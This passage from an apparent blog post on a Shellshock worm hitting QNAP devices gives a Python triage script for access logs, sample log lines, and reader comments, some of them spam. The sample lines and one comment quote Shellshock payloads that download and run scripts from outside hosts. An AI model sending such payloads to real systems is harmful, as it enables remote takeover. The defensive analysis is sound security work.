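URL = re.compile(r"https?://[^\s'\"&|;]+")
# sh or rm applied to a /tmp/... path; the last one decides the probe's fate.
# The lookbehind keeps "S0.sh -P /tmp" from being read as a "sh" command.
TMP_ACTION = re.compile(r"(?<![\w.])(sh|rm)\s+(?:-\w+\s+)*(/tmp/\S+)")

def parse_line(line):
    """Describe one Shellshock probe, or return None for a benign log line."""
    m = LOG_LINE.match(line)
    if not m or not SHELLSHOCK_PREFIX.search(m["ua"]):
        return None
    payload = SHELLSHOCK_PREFIX.split(m["ua"], 1)[1].strip()
    actions = TMP_ACTION.findall(payload)
    verb = actions[-1][0] if actions else None
    req = m["req"].split(" ")
    return {
        "src": m["src"],
        "path": req[1] if len(req) > 1 else m["req"],
        "payload": payload,
        "download_hosts": sorted({urlparse(u).netloc for u in URL.findall(payload)}),
        "stage2": {"sh": "executed", "rm": "deleted"}.get(verb, "unknown"),
    }

def triage(lines):
    """Return a probe record for every Shellshock line; benign lines are skipped."""
    return [r for r in (parse_line(ln) for ln in lines) if r]

def indicators(records):
    """Collapse probe records into the download hosts worth blocking and hunting for."""
    hosts = set()
    for r in records:
        hosts.update(r["download_hosts"])
    return sorted(hosts)

# Constructed log lines: client IPs from the documentation ranges, payloads and
# download hosts copied from the probes quoted in the post.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Dec/2014:14:02:11 +0000] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 364 "-" '
    '"() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && '
    '/usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 "',
    '198.51.100.7 - - [21/Dec/2014:14:05:42 +0000] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 364 "-" '
    '"() { :; }; /bin/rm -rf /tmp/io.php && /bin/mkdir -p /share/HDB_DATA/.../ && '
    '/usr/bin/wget -q -c http://nyo2k2.altervista.org/io.php -P /tmp && /bin/rm /tmp/io.php 0<&1 2>&1"',
    '192.0.2.9 - - [21/Dec/2014:14:06:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    import sys
    source = SAMPLE_LOG if sys.stdin.isatty() else (ln.rstrip("\n") for ln in sys.stdin)
    records = triage(source)
    for r in records:
        print(f'{r["src"]} {r["path"]} stage2={r["stage2"]} hosts={",".join(r["download_hosts"])}')
    print("indicators:", ", ".join(indicators(records)))
```

Feed it a real access log on stdin (`python3 triage.py < access.log`) or run it without input to see the constructed sample classified. A 404 in the status column, as in the lines above, does not mean the probe failed: the header is processed by the CGI handler before the response is decided, so the only reliable signal is the payload itself.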
BTW, thanks to Erich, who's also been looking at this worm and has been generous with the insights he's gleaned about it.
Thanks for your article. It is very helpful for me to understand the ShellShock attack against QNAP devices. Nowadays, some of the above attack traffic comes to Korea from the attacker. Thanks, have a good day.
I'm glad it was helpful.
They upgraded the bugged script:
localhost:80 93.104.83.77 - - [25/Mar/2015:17:17:56 -0300] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 364 "-" "() { :; }; /bin/rm -rf /tmp/S0.php /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://x3q.altervista.org/gH/S0.php -O /tmp/S0.sh && /bin/sh /tmp/S0.sh && sh S0.php 0<&1 2>&1 &"
Thanks for sharing! Nice post!
ReplyDeleteMáy ru võng hay võng điện cho bé hay võng tự đưa giúp bé ngủ ngon mà đưa võng tự động không tốn sức ru võng. Võng tự động hay vong em be tu dong chắc chắn, gọn gàng, dễ tháo xếp, dễ di chuyển và may dua vong dễ dàng bảo quản.
Chia sẻ các bạn có nên cho trẻ sơ sinh nằm nghiêng khi ngủ hay mơ thấy mình có bầu là điềm gì hay cách chống nắng bằng trà xanh hay Collagen trị mụn được không hay chữa mất ngủ bằng gừng đơn giản, bí quyết làm trắng da bằng cà phê và dầu dừa hay giảm cân nhanh bằng gạo lứt hq hay mẹo giúp tăng cường trí nhớ hiệu quả, kinh nghiệm trị tiêu chảy cho bé bằng cà rốt hiệu quả, những thực phẩm giúp cải thiện trí nhớ hiệu quả, mẹo hay giúp trẻ thích ăn rau hay cách giúp trẻ hạ sốt nhanh hiệu quả, bệnh viêm khớp không nên ăn gì hay mẹo giúp giảm độ cận thị cho bạn, bí quyết chống nắng với cà chua cực hiệu quả, cách giúp bé ngủ ngon giấc và thực phẩm giúp bé ngủ ngon mẹ nên biết, chia sẻ cách làm trắng da toàn thân bằng thực phẩm, những món ăn chữa bệnh mất ngủ hay mách mẹ mẹo giúp bé không sốt khi mọc răng hiệu quả
Những thực phẩm giúp đẹp da tại http://nhungthucphamgiupda.blogspot.com/
Thực phẩm giúp bạn trẻ đẹp tại http://thucphamgiuptre.blogspot.com/
Thực phẩm làm tăng tại http://thucphamlamtang.blogspot.com/
Những thực phẩm giúp làm giảm tại http://thucphamlamgiam.blogspot.com/
Great article and very interesting. I like to read articles, especially ones that talk about computer security and tips.
https://fixmypcerror.wordpress.com/
Looks like you did a lot of work on this just 2 days before I even started trying to understand what I was seeing.
This page probably didn't even have an index at the time, since I was unable to search this down and post it as a response to some Stack Overflow user's question.